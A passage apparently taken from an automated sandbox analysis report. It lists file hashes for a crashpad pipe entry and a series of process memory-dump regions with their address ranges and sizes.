                              b2d5f211b3a4eb53f06e432b5aad81caf90930b3

                              SHA256

                              393b36795513f3ab9625b4dcd988cb2b77a0d8e72378c9c632c632c8eaacd9d8

                              SHA512

                              071c2d5461ceb9f80d4cf375410ad156a21fcdb8433a445ba020ee2102887c99d1823645d7aef270c4f619f1588a405f6c12bd822e854817a686b5f3c44e33ee

                              Download Submit
                            • \??\pipe\LOCAL\crashpad_1868_OEQYIURTMLMWBTNJ
                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                              Download Submit
                            • memory/1156-129-0x0000015969E60000-0x0000015969E6C000-memory.dmp
                              Filesize

                              48KB

                              Download
                            • memory/1156-51-0x00000159699F0000-0x0000015969A06000-memory.dmp
                              Filesize

                              88KB

                              Download
                            • memory/1156-369-0x00000159699D0000-0x00000159699DA000-memory.dmp
                              Filesize

                              40KB

                              Download
                            • memory/1156-387-0x0000015969C00000-0x0000015969C0A000-memory.dmp
                              Filesize

                              40KB

                              Download
                            • memory/1156-131-0x000001594F550000-0x000001594F55C000-memory.dmp
                              Filesize

                              48KB

                              Download
                            • memory/1156-388-0x000001596A3E0000-0x000001596A3EA000-memory.dmp
                              Filesize

                              40KB

                              Download
                            • memory/2240-0-0x00007FFEC3173000-0x00007FFEC3175000-memory.dmp
                              Filesize

                              8KB

                              Download
                            • memory/2240-1-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                              Download
                            • memory/2240-38-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                              Download
                            • memory/2240-13-0x000002361A710000-0x000002361A726000-memory.dmp
                              Filesize

                              88KB

                              Download
                            • memory/2240-12-0x000002361A6E0000-0x000002361A6E8000-memory.dmp
                              Filesize

                              32KB

                              Download
                            • memory/2240-7-0x000002367E040000-0x000002367E062000-memory.dmp
                              Filesize

                              136KB

                              Download
                            • memory/4392-128-0x00000223F8410000-0x00000223F8486000-memory.dmp
                              Filesize

                              472KB

                              Download
                            • memory/4392-127-0x00000223F7F80000-0x00000223F7FC4000-memory.dmp
                              Filesize

                              272KB

                              Download
                            • memory/4808-15-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                              Download
                            • memory/4808-29-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                              Download
                            • memory/4808-25-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                              Download
                            • memory/4808-26-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmp
                              Filesize

                              10.8MB

                              Download
                            • memory/5064-62-0x0000000000410000-0x0000000000418000-memory.dmp
                              Filesize

                              32KB

                              Download